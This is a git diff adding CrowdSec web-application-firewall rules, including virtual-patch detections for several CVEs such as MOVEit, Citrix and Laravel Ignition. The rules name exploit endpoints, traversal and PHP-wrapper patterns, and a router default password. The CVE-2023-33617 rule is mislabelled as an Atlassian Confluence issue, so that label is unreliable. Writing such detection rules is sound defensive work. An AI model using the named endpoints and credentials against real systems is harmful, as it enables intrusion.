new file mode 100644
index 00000000000..e8510465c8c
--- /dev/null
+++ b/appsec-rules/crowdsecurity/base-config.yaml
@@ -0,0 +1,11 @@
+name: crowdsecurity/base-config
+#### This file is intended to provide a basic configuration for coraza:
+#### - Set the body processors based on the content-type
+
+seclang_rules:
+ - Secrule REQUEST_HEADERS:Content-Type "@rx ^application/x-www-form-urlencoded" "id:100,phase:1,pass,nolog,noauditlog,ctl:requestBodyProcessor=URLENCODED"
+ - Secrule REQUEST_HEADERS:Content-Type "@rx ^multipart/form-data" "id:101,phase:1,pass,nolog,noauditlog,ctl:requestBodyProcessor=MULTIPART"
+ - Secrule REQUEST_HEADERS:Content-Type "@rx ^application/xml" "id:102,phase:1,pass,nolog,noauditlog,ctl:requestBodyProcessor=XML"
+ - Secrule REQUEST_HEADERS:Content-Type "@rx ^application/json" "id:103,phase:1,pass,nolog,noauditlog,ctl:requestBodyProcessor=JSON"
+ - Secrule REQUEST_HEADERS:Content-Type "@rx ^text/xml" "id:104,phase:1,pass,nolog,noauditlog,ctl:requestBodyProcessor=XML"
+ - SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" "id:105,phase:1,pass,nolog,noauditlog,ctl:requestBodyProcessor=RAW" #Use our custom RAW body processor, just to have REQUEST_BODY set
diff --git a/appsec-rules/crowdsecurity/crs.yaml b/appsec-rules/crowdsecurity/crs.yaml
new file mode 100644
index 00000000000..720bea0d27a
--- /dev/null
+++ b/appsec-rules/crowdsecurity/crs.yaml
@@ -0,0 +1,180 @@
+name: crowdsecurity/crs
+seclang_rules:
+ - SecRuleEngine On
+ - SecRequestBodyAccess On
+seclang_files_rules:
+ - crs-setup.conf
+ - REQUEST-901-INITIALIZATION.conf
+ - REQUEST-905-COMMON-EXCEPTIONS.conf
+ - REQUEST-911-METHOD-ENFORCEMENT.conf
+ - REQUEST-913-SCANNER-DETECTION.conf
+ - REQUEST-920-PROTOCOL-ENFORCEMENT.conf
+ - REQUEST-921-PROTOCOL-ATTACK.conf
+ - REQUEST-922-MULTIPART-ATTACK.conf
+ - REQUEST-930-APPLICATION-ATTACK-LFI.conf
+ - REQUEST-931-APPLICATION-ATTACK-RFI.conf
+ - REQUEST-932-APPLICATION-ATTACK-RCE.conf
+ - REQUEST-933-APPLICATION-ATTACK-PHP.conf
+ - REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
+ - REQUEST-941-APPLICATION-ATTACK-XSS.conf
+ - REQUEST-942-APPLICATION-ATTACK-SQLI.conf
+ - REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf
+ - REQUEST-944-APPLICATION-ATTACK-JAVA.conf
+ - REQUEST-949-BLOCKING-EVALUATION.conf
+ - RESPONSE-950-DATA-LEAKAGES.conf
+ - RESPONSE-951-DATA-LEAKAGES-SQL.conf
+ - RESPONSE-952-DATA-LEAKAGES-JAVA.conf
+ - RESPONSE-953-DATA-LEAKAGES-PHP.conf
+ - RESPONSE-954-DATA-LEAKAGES-IIS.conf
+ - RESPONSE-955-WEB-SHELLS.conf
+ - RESPONSE-959-BLOCKING-EVALUATION.conf
+ - RESPONSE-980-CORRELATION.conf
+
+data:
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/crs-setup.conf
+    dest_file: crs-setup.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-901-INITIALIZATION.conf
+    dest_file: REQUEST-901-INITIALIZATION.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-905-COMMON-EXCEPTIONS.conf
+    dest_file: REQUEST-905-COMMON-EXCEPTIONS.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-911-METHOD-ENFORCEMENT.conf
+    dest_file: REQUEST-911-METHOD-ENFORCEMENT.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-913-SCANNER-DETECTION.conf
+    dest_file: REQUEST-913-SCANNER-DETECTION.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-920-PROTOCOL-ENFORCEMENT.conf
+    dest_file: REQUEST-920-PROTOCOL-ENFORCEMENT.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-921-PROTOCOL-ATTACK.conf
+    dest_file: REQUEST-921-PROTOCOL-ATTACK.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-922-MULTIPART-ATTACK.conf
+    dest_file: REQUEST-922-MULTIPART-ATTACK.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-930-APPLICATION-ATTACK-LFI.conf
+    dest_file: REQUEST-930-APPLICATION-ATTACK-LFI.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-931-APPLICATION-ATTACK-RFI.conf
+    dest_file: REQUEST-931-APPLICATION-ATTACK-RFI.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-932-APPLICATION-ATTACK-RCE.conf
+    dest_file: REQUEST-932-APPLICATION-ATTACK-RCE.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-933-APPLICATION-ATTACK-PHP.conf
+    dest_file: REQUEST-933-APPLICATION-ATTACK-PHP.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
+    dest_file: REQUEST-934-APPLICATION-ATTACK-GENERIC.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-941-APPLICATION-ATTACK-XSS.conf
+    dest_file: REQUEST-941-APPLICATION-ATTACK-XSS.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-942-APPLICATION-ATTACK-SQLI.conf
+    dest_file: REQUEST-942-APPLICATION-ATTACK-SQLI.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf
+    dest_file: REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-944-APPLICATION-ATTACK-JAVA.conf
+    dest_file: REQUEST-944-APPLICATION-ATTACK-JAVA.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/REQUEST-949-BLOCKING-EVALUATION.conf
+    dest_file: REQUEST-949-BLOCKING-EVALUATION.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-950-DATA-LEAKAGES.conf
+    dest_file: RESPONSE-950-DATA-LEAKAGES.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-951-DATA-LEAKAGES-SQL.conf
+    dest_file: RESPONSE-951-DATA-LEAKAGES-SQL.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-952-DATA-LEAKAGES-JAVA.conf
+    dest_file: RESPONSE-952-DATA-LEAKAGES-JAVA.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-953-DATA-LEAKAGES-PHP.conf
+    dest_file: RESPONSE-953-DATA-LEAKAGES-PHP.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-954-DATA-LEAKAGES-IIS.conf
+    dest_file: RESPONSE-954-DATA-LEAKAGES-IIS.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-955-WEB-SHELLS.conf
+    dest_file: RESPONSE-955-WEB-SHELLS.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-959-BLOCKING-EVALUATION.conf
+    dest_file: RESPONSE-959-BLOCKING-EVALUATION.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/RESPONSE-980-CORRELATION.conf
+    dest_file: RESPONSE-980-CORRELATION.conf
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/crawlers-user-agents.data
+    dest_file: crawlers-user-agents.data
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/iis-errors.data
+    dest_file: iis-errors.data
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/java-classes.data
+    dest_file: java-classes.data
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/java-code-leakages.data
+    dest_file: java-code-leakages.data
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/java-errors.data
+    dest_file: java-errors.data
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/lfi-os-files.data
+    dest_file: lfi-os-files.data
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/php-config-directives.data
+    dest_file: php-config-directives.data
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/php-errors.data
+    dest_file: php-errors.data
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/php-errors-pl2.data
+    dest_file: php-errors-pl2.data
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/php-function-names-933150.data
+    dest_file: php-function-names-933150.data
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/php-function-names-933151.data
+    dest_file: php-function-names-933151.data
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/php-variables.data
+    dest_file: php-variables.data
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/restricted-files.data
+    dest_file: restricted-files.data
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/restricted-upload.data
+    dest_file: restricted-upload.data
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/scanners-headers.data
+    dest_file: scanners-headers.data
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/scanners-urls.data
+    dest_file: scanners-urls.data
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/scanners-user-agents.data
+    dest_file: scanners-user-agents.data
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/scripting-user-agents.data
+    dest_file: scripting-user-agents.data
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/sql-errors.data
+    dest_file: sql-errors.data
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/ssrf.data
+    dest_file: ssrf.data
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/unix-shell.data
+    dest_file: unix-shell.data
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/web-shells-php.data
+    dest_file: web-shells-php.data
+    type: modsec
+  - source_url: https://raw.githubusercontent.com/crowdsecurity/sec-lists/waf-rules/waf/crs/windows-powershell-commands.data
+    dest_file: windows-powershell-commands.data
+    type: modsec
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2017-9841.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2017-9841.yaml
new file mode 100644
index 00000000000..68ffa64338f
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2017-9841.yaml
@@ -0,0 +1,23 @@
+name: crowdsecurity/vpatch-CVE-2017-9841
+description: "Detect CVE-2017-9841 exploits "
+rules:
+  - and:
+    - zones:
+      - URI
+      transform:
+      - lowercase
+      match:
+        type: endsWith
+        value: /util/php/eval-stdin.php
+labels:
+  type: exploit
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: "http:exploit"
+  label: "PHPUnit RCE (CVE-2017-9841)"
+  classification:
+   - cve.CVE-2017-9841
+   - attack.T1595
+   - attack.T1190
+   - cwe.CWE-94
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2019-12989.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2019-12989.yaml
new file mode 100644
index 00000000000..6611e1ed838
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2019-12989.yaml
@@ -0,0 +1,43 @@
+name: crowdsecurity/vpatch-CVE-2019-12989
+description: "Detect CVE-2019-12989 exploits "
+rules:
+  - and:
+    - zones:
+      - METHOD
+      match:
+        type: equals
+        value: POST
+    - zones:
+      - URI
+      transform:
+      - lowercase
+      match:
+        type: endsWith
+        value: /sdwan/nitro/v1/config/get_package_file
+    - zones:
+      - ARGS
+      variables:
+       - action
+      transform:
+      - lowercase
+      match:
+        type: equals
+        value: "file_download"
+    - zones:
+      - BODY_ARGS
+      variables:
+       - json.get_package_file.site_name
+      match:
+        type: libinjectionSQL
+labels:
+  type: exploit
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: "http:exploit"
+  label: "citrix SQLi (CVE-2019-12989)"
+  classification:
+   - cve.CVE-2019-12989
+   - attack.T1595
+   - attack.T1190
+   - cwe.CWE-89
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2020-11738.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2020-11738.yaml
new file mode 100644
index 00000000000..d42fbef1ca2
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2020-11738.yaml
@@ -0,0 +1,37 @@
+name: crowdsecurity/vpatch-CVE-2020-11738
+description: "Detect CVE-2020-11738 exploits "
+rules:
+  - and:
+    - zones:
+      - URI
+      transform:
+      - lowercase
+      match:
+        type: endsWith
+        value: /wp-admin/admin-ajax.php
+    - zones:
+      - ARGS
+      variables:
+        - action
+      match:
+        type: equals
+        value: duplicator_download
+    - zones:
+      - ARGS
+      variables:
+        - file
+      match:
+        type: contains
+        value: ".."
+labels:
+  type: exploit
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: "http:exploit"
+  label: "Wordpress Snap Creek Duplicator (CVE-2020-11738)"
+  classification:
+   - cve.CVE-2020-11738
+   - attack.T1595
+   - attack.T1190
+   - cwe.CWE-22
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2021-22941.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2021-22941.yaml
new file mode 100644
index 00000000000..54dc411a9e1
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2021-22941.yaml
@@ -0,0 +1,35 @@
+name: crowdsecurity/vpatch-CVE-2021-22941
+description: "Detect CVE-2021-22941 exploits "
+rules:
+  - and:
+    - zones:
+      - METHOD
+      match:
+        type: equals
+        value: POST
+    - zones:
+      - URI
+      transform:
+      - lowercase
+      match:
+        type: endsWith
+        value: /upload.aspx
+    - zones:
+      - ARGS
+      variables:
+       - uploadid
+      match:
+        type: contains
+        value: ".."
+labels:
+  type: exploit
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: "http:exploit"
+  label: "Citrix RCE (CVE-2021-22941)"
+  classification:
+   - cve.CVE-2021-22941
+   - attack.T1595
+   - attack.T1190
+   - cwe.CWE-284
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2021-3129.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2021-3129.yaml
new file mode 100644
index 00000000000..ad84d4c6599
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2021-3129.yaml
@@ -0,0 +1,30 @@
+name: crowdsecurity/vpatch-CVE-2021-3129
+description: "Detect CVE-2021-3129 exploits "
+rules:
+  - and:
+    - zones:
+      - URI
+      transform:
+      - lowercase
+      match:
+        type: endsWith
+        value: /_ignition/execute-solution
+    - zones:
+      - BODY_ARGS
+      variables:
+      - json.parameters.viewFile
+      match:
+        type: regex
+        value: "php://filter|phar://"
+labels:
+  type: exploit
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: "http:exploit"
+  label: "Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution (CVE-2021-3129)"
+  classification:
+   - cve.CVE-2021-3129
+   - attack.T1595
+   - attack.T1190
+   - cwe.CWE-98
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2022-27926.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2022-27926.yaml
new file mode 100644
index 00000000000..25974ee90d4
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2022-27926.yaml
@@ -0,0 +1,31 @@
+name: crowdsecurity/vpatch-CVE-2022-27926
+description: "Detect CVE-2022-27926 exploits "
+rules:
+  - and:
+    - zones:
+      - URI
+      transform:
+      - lowercase
+      match:
+        type: endsWith
+        value: /public/error.jsp
+    - zones:
+      - ARGS
+      variables:
+      - errCode
+      transform:
+      - lowercase
+      match:
+        type: libinjectionXSS
+labels:
+  type: exploit
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: "http:exploit"
+  label: "Zimbra Collaboration (ZCS) - Cross Site Scripting (CVE-2022-27926)"
+  classification:
+   - cve.CVE-2022-27926
+   - attack.T1595
+   - attack.T1190
+   - cwe.CWE-79
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2022-35914.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2022-35914.yaml
new file mode 100644
index 00000000000..f5aad071f58
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2022-35914.yaml
@@ -0,0 +1,24 @@
+name: crowdsecurity/vpatch-CVE-2022-35914
+description: "Detect CVE-2022-35914 exploits "
+rules:
+  - and:
+    - zones:
+      - URI
+      transform:
+      - lowercase
+      match:
+        type: endsWith
+        value: /vendor/htmlawed/htmlawed/htmlawedtest.php
+
+labels:
+  type: exploit
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: "http:exploit"
+  label: "GLPI <=10.0.2 - Remote Command Execution (CVE-2022-35914)"
+  classification:
+   - cve.CVE-2022-35914
+   - attack.T1595
+   - attack.T1190
+   - cwe.CWE-74
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2022-44877.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2022-44877.yaml
new file mode 100644
index 00000000000..66b6ceeba64
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2022-44877.yaml
@@ -0,0 +1,30 @@
+name: crowdsecurity/vpatch-CVE-2022-44877
+description: "Detect CVE-2022-44877 exploits "
+rules:
+  - and:
+    - zones:
+      - URI
+      transform:
+      - lowercase
+      match:
+        type: endsWith
+        value: /login/index.php
+    - zones:
+      - ARGS
+      variables:
+      - login
+      match:
+        type: regex
+        value: "[^a-zA-Z0-9_.-]+"
+labels:
+  type: exploit
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: "http:exploit"
+  label: "CentOS Web Panel 7 RCE (CVE-2022-44877)"
+  classification:
+   - cve.CVE-2022-44877
+   - attack.T1595
+   - attack.T1190
+   - cwe.CWE-78
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2022-46169.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2022-46169.yaml
new file mode 100644
index 00000000000..c73dd16afde
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2022-46169.yaml
@@ -0,0 +1,34 @@
+name: crowdsecurity/vpatch-CVE-2022-46169
+description: "Detect CVE-2022-46169 exploits "
+rules:
+  - and:
+    - zones:
+      - URI
+      transform:
+      - lowercase
+      match:
+        type: endsWith
+        value: /remote_agent.php
+    - zones:
+      - ARGS
+      variables:
+      - poller_id
+      match:
+        type: regex
+        value: "[^a-zA-Z0-9_]"
+
+labels:
+  type: exploit
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: "http:exploit"
+  label: "Cacti <=1.2.22 - Remote Command Injection (CVE-2022-46169)"
+  classification:
+   - cve.CVE-2022-46169
+   - attack.T1595
+   - attack.T1190
+   - cwe.CWE-74
+   - cwe.CWE-77
+   - cwe.CWE-78
+   - cwe.CWE-863
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-20198.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-20198.yaml
new file mode 100644
index 00000000000..1c51bb3dc9b
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-20198.yaml
@@ -0,0 +1,28 @@
+name: crowdsecurity/vpatch-CVE-2023-20198
+description: "Detect CVE-2023-20198 exploits "
+rules:
+  - and:
+    - zones:
+      - URI
+      transform:
+      - lowercase
+      match:
+        type: endsWith
+        value: /%77ebui_wsma_https
+    - zones:
+      - METHOD
+      match:
+        type: equals
+        value: POST
+labels:
+  type: exploit
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: "http:exploit"
+  label: "CISCO IOS XE account creation (CVE-2023-20198)"
+  classification:
+   - cve.CVE-2023-20198
+   - attack.T1595
+   - attack.T1190
+   - cwe.CWE-287
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-22515.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-22515.yaml
new file mode 100644
index 00000000000..8a54159d587
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-22515.yaml
@@ -0,0 +1,37 @@
+name: crowdsecurity/vpatch-CVE-2023-22515
+description: "Detect CVE-2023-22515 exploits "
+rules:
+  - and:
+    - zones:
+      - URI
+      transform:
+      - lowercase
+      match:
+        type: endsWith
+        value: /setup/setupadministrator.action
+    - zones:
+      - METHOD
+      match:
+        type: equals
+        value: POST
+    - zones:
+      - HEADERS
+      variables:
+       - x-atlassian-token
+      transform:
+      - lowercase
+      match:
+        type: equals
+        value: "no-check"
+labels:
+  type: exploit
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: "http:exploit"
+  label: "Atlassian Confluence Privesc (CVE-2023-22515)"
+  classification:
+   - cve.CVE-2023-22515
+   - attack.T1595
+   - attack.T1190
+   - cwe.CWE-284
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-24489.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-24489.yaml
new file mode 100644
index 00000000000..5cbdf941526
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-24489.yaml
@@ -0,0 +1,41 @@
+name: crowdsecurity/vpatch-CVE-2023-24489
+description: "Detect CVE-2023-24489 exploits "
+rules:
+  - and:
+    - zones:
+      - URI
+      transform:
+      - lowercase
+      match:
+        type: endsWith
+        value: /documentum/upload.aspx
+    - zones:
+      - METHOD
+      match:
+        type: equals
+        value: POST
+    - zones:
+      - ARGS
+      variables:
+       - uploadid
+      match:
+        type: contains
+        value: ".."
+    - zones:
+      - RAW_BODY
+#it seems 'Page_Load' is the handler that can be abused, maybe some others can?
+      match:
+        type: contains
+        value: "Page_Load"
+labels:
+  type: exploit
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: "http:exploit"
+  label: "Citrix ShareFile RCE (CVE-2023-24489)"
+  classification:
+   - cve.CVE-2023-24489
+   - attack.T1595
+   - attack.T1190
+   - cwe.CWE-284
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-33617.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-33617.yaml
new file mode 100644
index 00000000000..0f35bc2d2e1
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-33617.yaml
@@ -0,0 +1,70 @@
+name: crowdsecurity/vpatch-CVE-2023-33617
+description: "Detect CVE-2023-33617 exploits "
+rules:
+  - and:
+    - zones:
+      - METHOD
+      transform:
+      - lowercase
+      match:
+        type: equals
+        value: post
+    - zones:
+      - URI
+      transform:
+      - lowercase
+      match:
+        type: endsWith
+        value: /boaform/admin/formlogin
+    - zones:
+      - BODY_ARGS
+      variables:
+       - username
+      transform:
+      - lowercase
+      match:
+        type: equals
+        value: "admin"
+    - zones:
+      - BODY_ARGS
+      variables:
+       - psd
+      transform:
+      - lowercase
+      match:
+        type: equals
+        value: "parks"
+  - and:
+    - zones:
+      - METHOD
+      match:
+        type: equals
+        value: POST
+    - zones:
+      - URI
+      transform:
+      - lowercase
+      match:
+        type: endsWith
+        value: /boaform/admin/formping
+    - zones:
+      - BODY_ARGS
+      variables:
+      - target_addr
+      transform:
+      - lowercase
+      match:
+        type: regex
+        value: "[^a-f0-9:.]+"
+labels:
+  type: exploit
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: "http:exploit"
+  label: "Atlassian Confluence Privesc (CVE-2023-33617)"
+  classification:
+   - cve.CVE-2023-33617
+   - attack.T1595
+   - attack.T1190
+   - cwe.CWE-78
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-34362.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-34362.yaml
new file mode 100644
index 00000000000..f1e84739d77
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-34362.yaml
@@ -0,0 +1,52 @@
+
+name: crowdsecurity/vpatch-CVE-2023-34362
+description: "Detect CVE-2023-34362 exploits "
+rules:
+  - and:
+    - zones:
+      - URI
+      transform:
+      - lowercase
+      match:
+        type: equals
+        value: /moveitisapi/moveitisapi.dll
+    - zones:
+      - ARGS
+      variables:
+      - action
+      match:
+        type: equals
+        value: m2
+      transform:
+      - lowercase
+    - zones:
+      - METHOD
+      match:
+        type: equals
+        value: POST
+    - zones:
+      - HEADERS_NAMES
+      transform:
+        - lowercase
+      match:
+        type: equals
+        value: 'x-silock-transaction'
+    - zones:
+      - HEADERS_NAMES
+      transform:
+       - lowercase
+      match:
+        type: regex
+        value: '.+x-silock-transaction'
+labels:
+  type: exploit
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: "http:exploit"
+  label: "MOVEit Transfer - Remote Code Execution (CVE-2023-34362)"
+  classification:
+   - cve.CVE-2023-34362
+   - attack.T1595
+   - attack.T1190
+   - cwe.CWE-89
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-3519.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-3519.yaml
new file mode 100644
index 00000000000..e03c6c407e0
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-3519.yaml
@@ -0,0 +1,37 @@
+name: crowdsecurity/vpatch-CVE-2023-3519
+description: "Detect CVE-2023-3519 exploits "
+rules:
+  - and:
+    - zones:
+      - METHOD
+      match:
+        type: equals
+        value: GET
+    - zones:
+      - URI
+      transform:
+      - lowercase
+      match:
+        type: endsWith
+        value: /gwtest/formssso
+    - zones:
+      - ARGS
+      variables:
+       - target
+      transform:
+      - length
+      match:
+        type: gte
+        value: 100
+labels:
+  type: exploit
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: "http:exploit"
+  label: "Citrix RCE (CVE-2023-3519)"
+  classification:
+   - cve.CVE-2023-3519
+   - attack.T1595
+   - attack.T1190
+   - cwe.CWE-94
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-38205.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-38205.yaml
new file mode 100644
index 00000000000..f8f59130322
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2023-38205.yaml
@@ -0,0 +1,23 @@
+name: crowdsecurity/vpatch-CVE-2023-38205
+description: "Detect CVE-2023-38205 exploits "
+rules:
+  - and:
+    - zones:
+      - URI
+      transform:
+      - lowercase
+      match:
+        type: contains
+        value: ..cfide/wizards/common/
+labels:
+  type: exploit
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: "http:exploit"
+  label: "Adobe ColdFusion access control bypass (CVE-2023-38205)"
+  classification:
+   - cve.CVE-2023-38205
+   - attack.T1595
+   - attack.T1190
+   - cwe.CWE-284
\ No newline at end of file
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2023-40044.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2023-40044.yaml
new file mode 100644
index 00000000000..93aab371a94
--- /dev/null
